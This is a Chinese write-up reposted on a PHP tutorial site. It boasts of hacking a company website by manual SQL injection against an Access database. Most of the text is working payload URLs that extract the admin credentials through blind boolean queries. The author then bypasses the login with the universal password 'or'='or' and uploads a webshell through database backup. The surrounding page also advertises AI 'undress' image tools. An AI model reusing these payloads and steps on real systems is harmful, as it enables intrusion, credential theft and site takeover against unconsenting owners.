手工注入access拿下某网站过程-Mysql Tutorial-php.cn

Home

Database

Mysql Tutorial

手工注入access拿下某网站过程

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 03:06 PM

access Hacked r injection website process

hacked by {R.H.T}12 http://www.xxx.com/NewsInfo.asp?id=95' 返回了错误页面。 http://www.xxx.com/NewsInfo.asp?id=95%20and%201=1 正确页面。 http://www.xxx.com/NewsInfo.asp?id=95%20and%201=2 返回了错误页面。 http://www.xxx.com/NewsInfo.asp?id=

hacked by {R.H.T}12

http://www.xxx.com/NewsInfo.asp?id=95'

返回了错误页面。

http://www.xxx.com/NewsInfo.asp?id=95%20and%201=1

正确页面。

http://www.xxx.com/NewsInfo.asp?id=95%20and%201=2

返回了错误页面。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists(selectcount(*)fromsysobjects)

返回了错误页面。确定ACCESS数据库。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin)

出错了。没有admin 的表名

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20vipusers)

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20account)

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin_userinfo)

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin_user)

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20manage)

都没有。。。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20manage_user)

有了。

猜出表名manage_user

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(password)%20from%20manage_user)>0

一下子就猜出了password的列名。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(user)%20from%20manage_user)>0

错误页面。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(manage_user)%20from%20manage_user)>0

错误页面。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(username)%20from%20manage_user)>0

正确页面。

整理下。

manage_user表。

列名为。

username

password

典型的垃圾站点。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)>5

出错了。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)

正确页面

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)=1

正确页面。只有一条记录数。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)>3

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)>5

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)=5

正确了。

管理员用户名字的数字有5位。

丫肯定用的admin

试下。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,1,1))%20from%20manage_user)=97

转换下。97就是a

我们问问第二位是不是d吧。

这个时候刚好临近0点。突然掉线了。。。很纠结。。关键时刻阳痿了一样。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,2,1))%20from%20manage_user)=100
返回了正常页面。100就是d

第一位是a第二位是d一共5个字母。一般都是admin

这个时候群里开始叫了。。大家刚才都掉线了。。有人说台湾黑客攻击。很快。有人说国外刚才也掉线了。。具体原因现在不明。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,3,1))%20from%20manage_user)=109

第三位是m

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,4,1))%20from%20manage_user)=105

第四位是i

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,5,1))%20from%20manage_user)=110

第五位是n

okey`admin

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(password)from%20manage_user)=6

直接正确。密码有6位。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>50

返回正常。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>70

返回错误

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>60

错了。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>65

错了

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)=63

错了

。。。。迷糊了。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)=55

对了。。。。

55转换下。是7

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,2,1))%20from%20manage_user)=55

第二位也是7

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,3,1))%20from%20manage_user)=55

第三位不是了。。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,3,1))%20from%20manage_user)=59

对了。59转换下是;

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,4,1))%20from%20manage_user)=57

第四位。57转换下。是9

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,5,1))%20from%20manage_user)=62

第五位。转换下 62是>

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,6,1))%20from%20manage_user)=62

第六位也是。。

总结下。

账号admin

密码77;9>>

OK 我们找后台。

http://www.xxx.com/manage/Login.asp

直接根据表名猜。猜对了。

用账号密码登陆。。。

提示账号密码不对~！

纠结。

难道不是这个后台。。

用工具扫了一下。。只扫出这么一个后台。

怎么办。

猜账号密码admin admin

不对。。这种傻逼已经很少了。

admin admin888

试了很久。。打算放弃了。

突然想起了万能密码。

'or'='or'

进去了。。。。。。

我就操他女马了。。。这个漏洞竟然还有。。。这什么垃圾站点。xxxxx邦汽车用品公司。。。

我怒了。提权。

看了下后台。在留言版那里看见有人插了一句话木马。我靠。删掉。

可以备份数据库。直接备份数据库传马。

OK拿下。

http://www.xxx.com/UploadFiles/2010491394386.asp

http://www.xxx.com/1.asp

点评：笔者写的很详细了，其中管理密码这里是典型的雷池加密，77;9>>=658598。

标签分类：脚本渗透

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Best Graphic Settings

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Assassin's Creed Shadows: Seashell Riddle Solution

1 weeks ago By DDD

R.E.P.O. How to Fix Audio if You Can't Hear Anyone

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Where to find the Crane Control Keycard in Atomfall

1 weeks ago By DDD

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Where is the login entrance for gmail email?

7436

CakePHP Tutorial

1359

What is the format of the account name of steam

win11 activation key permanent

Related knowledge

How to disable background applications in Windows 11_Windows 11 tutorial to disable background applications May 07, 2024 pm 04:20 PM

1. Open settings in Windows 11. You can use Win+I shortcut or any other method. 2. Go to the Apps section and click Apps & Features. 3. Find the application you want to prevent from running in the background. Click the three-dot button and select Advanced Options. 4. Find the [Background Application Permissions] section and select the desired value. By default, Windows 11 sets power optimization mode. It allows Windows to manage how applications work in the background. For example, once you enable battery saver mode to preserve battery, the system will automatically close all apps. 5. Select [Never] to prevent the application from running in the background. Please note that if you notice that the program is not sending you notifications, failing to update data, etc., you can

How to convert deepseek pdf Feb 19, 2025 pm 05:24 PM

DeepSeek cannot convert files directly to PDF. Depending on the file type, you can use different methods: Common documents (Word, Excel, PowerPoint): Use Microsoft Office, LibreOffice and other software to export as PDF. Image: Save as PDF using image viewer or image processing software. Web pages: Use the browser's "Print into PDF" function or the dedicated web page to PDF tool. Uncommon formats: Find the right converter and convert it to PDF. It is crucial to choose the right tools and develop a plan based on the actual situation.

Can't allow access to camera and microphone in iPhone Apr 23, 2024 am 11:13 AM

Are you getting "Unable to allow access to camera and microphone" when trying to use the app? Typically, you grant camera and microphone permissions to specific people on a need-to-provide basis. However, if you deny permission, the camera and microphone will not work and will display this error message instead. Solving this problem is very basic and you can do it in a minute or two. Fix 1 – Provide Camera, Microphone Permissions You can provide the necessary camera and microphone permissions directly in settings. Step 1 – Go to the Settings tab. Step 2 – Open the Privacy & Security panel. Step 3 – Turn on the “Camera” permission there. Step 4 – Inside, you will find a list of apps that have requested permission for your phone’s camera. Step 5 – Open the “Camera” of the specified app

What does field mean in java Apr 25, 2024 pm 10:18 PM

In Java, a "field" is a data member in a class or interface that is used to store data or state. The properties of field include: type (can be any Java data type), access rights, static (belongs to a class rather than an instance), final (immutable) and transient (not serialized). Field is used to store state information of a class or interface, such as storing object data and maintaining object state.

How does the Java reflection mechanism modify the behavior of a class? May 03, 2024 pm 06:15 PM

The Java reflection mechanism allows programs to dynamically modify the behavior of classes without modifying the source code. By operating the Class object, you can create instances through newInstance(), modify private field values, call private methods, etc. Reflection should be used with caution, however, as it can cause unexpected behavior and security issues, and has a performance overhead.

How to read dbf file in oracle May 10, 2024 am 01:27 AM

Oracle can read dbf files through the following steps: create an external table and reference the dbf file; query the external table to retrieve data; import the data into the Oracle table.

Common exception types and their repair measures in Java function development May 03, 2024 pm 02:09 PM

Common exception types and their repair measures in Java function development During the development of Java functions, various exceptions may be encountered, which affect the correct execution of the function. The following are common exception types and their repair measures: 1. NullPointerException Description: Thrown when accessing an object that has not been initialized. Fix: Make sure you check the object for non-null before using it. Sample code: try{Stringname=null;System.out.println(name.length());}catch(NullPointerExceptione){

How to cross-domain iframe in vue May 02, 2024 pm 10:48 PM

Ways to solve iframe cross-domain issues in Vue: CORS: Enable CORS support in the backend server and use XMLHttpRequest or fetch API to send CORS requests in Vue. JSONP: Dynamically load JSONP scripts in Vue using the JSONP endpoint in the backend server. Proxy server: Set up a proxy server to forward requests, use a third-party library (such as axios) in Vue to send requests and set the proxy server URL.

See all articles